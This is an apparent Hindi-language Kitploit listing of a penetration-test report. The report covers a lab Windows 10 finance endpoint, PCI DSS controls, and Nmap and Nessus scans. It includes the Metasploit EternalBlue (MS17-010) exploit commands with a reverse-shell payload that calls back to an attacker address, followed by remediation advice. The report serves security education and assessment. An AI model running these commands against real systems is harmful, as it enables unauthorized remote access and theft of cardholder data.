Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint — यह रिपोर्ट एक संरचित VAPT अभियान का वर्णन करती है जो PCI DSS अनुपालन, SMB सेवा गणना, और एक वित्त-उन्मुख बुनियादी ढांचे के भीतर Windows 10 मशीन पर CVE-2017-0144 (EternalBlue) के शोषण पर केंद्रित है। | Kitploit
उपकरण/GitHubGitHub/adityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint
टोहीभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubadityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

यह रिपोर्ट एक संरचित VAPT अभियान का वर्णन करती है जो PCI DSS अनुपालन, SMB सेवा गणना, और एक वित्त-उन्मुख बुनियादी ढांचे के भीतर Windows 10 मशीन पर CVE-2017-0144 (EternalBlue) के शोषण पर केंद्रित है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1511 साल पहलेअभी तक समीक्षित नहीं

विंडोज 10 वित्त एंडपॉइंट में SMB शोषण पर VAPT रिपोर्ट

यह रिपोर्ट एक संरचित VAPT प्रतिबद्धता की रूपरेखा प्रस्तुत करती है जो PCI DSS अनुपालन, SMB सेवा गणना, और वित्त-उन्मुख बुनियादी ढांचे में एक विंडोज 10 मशीन पर CVE-2017-0144 (EternalBlue) के शोषण पर केंद्रित है।


🔐 परिचय

वित्तीय संस्थानों को साइबर सुरक्षा क्षेत्र में सबसे कठोर अनुपालन आवश्यकताओं का सामना करना पड़ता है। संवेदनशील ग्राहक डेटा और कार्डधारक जानकारी दांव पर होने के कारण, सुरक्षा कॉन्फ़िगरेशन त्रुटियाँ विनाशकारी उल्लंघनों का कारण बन सकती हैं। यह VAPT सिमुलेशन PCI DSS अनुपालन के दृष्टिकोण से विंडोज 10-आधारित एंडपॉइंट सिस्टम की सुरक्षा स्थिति का मूल्यांकन करने के साथ-साथ उजागर SMB सेवाओं में ज्ञात कमजोरियों की पहचान और शोषण करने के लिए किया गया था।

सिमुलेशन कई चरणों को कवर करती है—Nessus का उपयोग करके टोही और भेद्यता स्कैनिंग से लेकर Metasploit के माध्यम से वास्तविक दुनिया के शोषण तक। रिपोर्ट वित्तीय नेटवर्क की अखंडता बनाए रखने में एंडपॉइंट हार्डनिंग, पैच प्रबंधन, फ़ायरवॉल प्रवर्तन और PCI DSS संरेखण के महत्व पर और जोर देती है।

Aditya Bhatt


भेद्यता आकलन और पैठ परीक्षण (VAPT) रिपोर्ट

लक्ष्य: विंडोज 10 होस्ट – वित्त क्षेत्र एंडपॉइंट

द्वारा तैयार: Aditya Bhatt
पदनाम: VAPT विश्लेषक | साइबर सुरक्षा पेशेवर
संपर्क: [email protected] | +91-9818993884


कार्यकारी सारांश

यह रिपोर्ट एक विंडोज 10 एंडपॉइंट पर किए गए पैठ परीक्षण के परिणाम प्रस्तुत करती है जिसके बारे में संदेह था कि यह वित्तीय डेटा और क्रेडिट कार्ड लेनदेन को संभालता है। उद्देश्य PCI DSS नियंत्रण कार्यान्वयन को मान्य करना और संभावित हमले के वैक्टर की पहचान करना था जो कार्डधारक डेटा से समझौता कर सकते हैं।

Nessus का उपयोग करके, होस्ट को CVE-2017-0144 (EternalBlue)—एक महत्वपूर्ण SMB भेद्यता—के प्रति संवेदनशील पाया गया। फिर इस दोष का शोषण करने और अनधिकृत रिमोट शेल एक्सेस प्राप्त करने के लिए Metasploit फ्रेमवर्क का उपयोग किया गया। यह रिपोर्ट वित्तीय प्रणालियों में डेटा उल्लंघनों से बचने के लिए समय पर पैच प्रबंधन और नेटवर्क सेवा हार्डनिंग के महत्व को उजागर करती है।


उद्देश्य

  • लक्ष्य एंडपॉइंट पर PCI DSS आवश्यकता अनुपालन का आकलन करना।
  • विंडोज 10 सिस्टम पर कमजोरियों की गणना और पहचान करना।
  • मानक उपकरणों और तकनीकों का उपयोग करके खोजी गई कमजोरियों का शोषण करना।
  • सिस्टम सुरक्षा और अनुपालन में सुधार के लिए उपचारात्मक कार्रवाइयों की सिफारिश करना।

कार्यप्रणाली

कार्य 1: PCI DSS अनुपालन मूल्यांकन

PCI DSS के छह प्राथमिक उद्देश्यों और बारह आवश्यकताओं की समीक्षा की गई। प्रमुख सिद्धांतों में शामिल हैं:

  • फ़ायरवॉल लागू करना और विक्रेता डिफ़ॉल्ट बदलना
  • भंडारण और प्रसारण के दौरान कार्डधारक डेटा को एन्क्रिप्ट करना
  • एंटी-वायरस, सुरक्षित कॉन्फ़िगरेशन और पैच प्रबंधन का उपयोग करना
  • पहुँच नियंत्रण और प्रमाणीकरण तंत्र लागू करना
  • निगरानी, लॉगिंग और नियमित भेद्यता स्कैन करना
  • संगठन-व्यापी सुरक्षा नीति बनाना और लागू करना

कार्य 2: भेद्यता खोज

लक्ष्य सिस्टम:

  • विंडोज 10 VM
  • आईपी पता: 10.10.195.105
  • सबनेट: 255.0.0.0

उपयोग किए गए उपकरण:

  • पोर्ट और सेवा खोज के लिए Nmap
  • भेद्यता स्कैनिंग के लिए Nessus
  • शोषण के लिए Metasploit

मुख्य आदेश:

root@kitploit:~
nmap -sn 10.10.195.105

5

root@kitploit:~
nmap -sV -p445 10.10.195.105

6

root@kitploit:~
nmap -F 10.10.195.105

1

  • पोर्ट 445 (SMB) खुला पाया गया
  • Nessus ने भेद्यता की पहचान की: CVE-2017-0144 (EternalBlue)

2 png
3
4


कार्य 3: शोषण

स्कैनर:

Nessus स्कैन का प्रयास:

7
8
9
10
11
12
13
14
15

Metasploit स्कैन का प्रयास:

root@kitploit:~
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run

16
17

शोषण मॉड्यूल:

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit

18
19
20

  • परिणाम: लक्ष्य विंडोज 10 मशीन पर रिमोट शेल सफलतापूर्वक खोला गया
  • संवेदनशील सिस्टम तक अनधिकृत पहुँच की पुष्टि हुई

मुख्य निष्कर्ष

  • SMBv1 सक्रिय और नेटवर्क के लिए उजागर
  • EternalBlue (MS17-010) बिना पैच और शोषण योग्य
  • Nessus स्कैन ने कई उच्च-गंभीरता वाली कमजोरियों का खुलासा किया
  • लेटरल मूवमेंट को रोकने के लिए कोई फ़ायरवॉल या नेटवर्क सेग्मेंटेशन नहीं
  • डिफ़ॉल्ट नेटवर्क सेवाएँ अनावश्यक रूप से खुली हैं

जोखिम विश्लेषण


सिफारिशें

  1. पैच प्रबंधन

    • तुरंत CVE-2017-0144 के लिए Microsoft के सुरक्षा अद्यतन को लागू करें
    • निरंतर भेद्यता स्कैनिंग और पैच चक्र लागू करें
  2. नेटवर्क हार्डनिंग

    • SMBv1 प्रोटोकॉल को पूरी तरह से अक्षम करें
    • SMB सेवा पहुँच को केवल आंतरिक, विश्वसनीय नेटवर्क तक सीमित करें
  3. फ़ायरवॉल प्रवर्तन

    • सार्वजनिक इंटरफ़ेस पर पोर्ट 445 को ब्लॉक करें
    • वास्तविक समय में SMB-आधारित हमलों का पता लगाने के लिए IPS/IDS का उपयोग करें
  4. निरंतर निगरानी

    • विसंगतियों का पता लगाने और घटनाओं को सहसंबंधित करने के लिए SIEM उपकरण तैनात करें
    • नए जोखिमों का आकलन करने के लिए बार-बार Nessus स्कैन शेड्यूल करें
  5. PCI DSS अनुपालन

    • बहु-कारक प्रमाणीकरण और न्यूनतम विशेषाधिकार पहुँच लागू करें
    • पारगमन और आराम में सभी कार्डधारक डेटा को एन्क्रिप्ट करें
    • पूर्ण नियंत्रण कवरेज सुनिश्चित करने के लिए नियमित ऑडिट करें
  6. जागरूकता प्रशिक्षण

    • आईटी टीमों और हितधारकों के लिए समय-समय पर प्रशिक्षण सत्र आयोजित करें
    • वित्तीय डेटा के सुरक्षित प्रबंधन और भेद्यता प्रतिक्रिया प्रक्रियाओं को शामिल करें

निष्कर्ष

इस प्रतिबद्धता ने स्पष्ट रूप से प्रदर्शित किया कि SMBv1 जैसी बिना पैच और पुरानी सेवाएँ सार्वजनिक रूप से ज्ञात शोषणों का उपयोग करके पूर्ण सिस्टम समझौता कर सकती हैं। यहाँ शोषित EternalBlue भेद्यता इस बात का एक उत्कृष्ट उदाहरण है कि वित्तीय बुनियादी ढाँचे में समय पर पैचिंग, सेवा न्यूनीकरण और सक्रिय स्कैनिंग क्यों अपरिहार्य हैं।

PCI DSS जैसे ढाँचों के अनुपालन के बिना, संगठन कानूनी दंड और विनाशकारी डेटा उल्लंघन दोनों का जोखिम उठाते हैं।


🛡️ अंतिम विचार

सुरक्षा कमियाँ अक्सर विरासत प्रोटोकॉल और भूले हुए पैच के पीछे छिपी रहती हैं। इस प्रतिबद्धता ने प्रत्येक सेवा—विशेष रूप से SMB जैसी—को सुविधा के रूप में नहीं, बल्कि जोखिम सतह के रूप में मानने की गंभीरता की पुष्टि की।

वित्त क्षेत्र में मजबूत साइबर सुरक्षा निरंतर सतर्कता, लागू नीतियों और अटूट पैच प्रबंधन से शुरू होती है।

इस रिपोर्ट को पढ़ने के लिए धन्यवाद। मुझे आशा है कि इसने स्पष्टता, व्यावहारिक अंतर्दृष्टि और इस बात की पुष्टि प्रदान की है कि निरंतर सुरक्षा सत्यापन क्यों आवश्यक है—विशेषकर वित्तीय डेटा को संभालते समय।

– अदित्य भट्ट
VAPT विश्लेषक | साइबर सुरक्षा पेशेवर


टूल डाउनलोड करें
जोखिम विवरणप्रभावसंभावनाजोखिम स्कोर
EternalBlue शोषण (SMBv1)उच्चउच्चगंभीर
पैच प्रबंधन की कमीउच्चमध्यमउच्च
नेटवर्क पहुँच नियंत्रणों का अभावमध्यमउच्चउच्च
PCI DSS के साथ गैर-अनुपालनउच्चउच्चगंभीर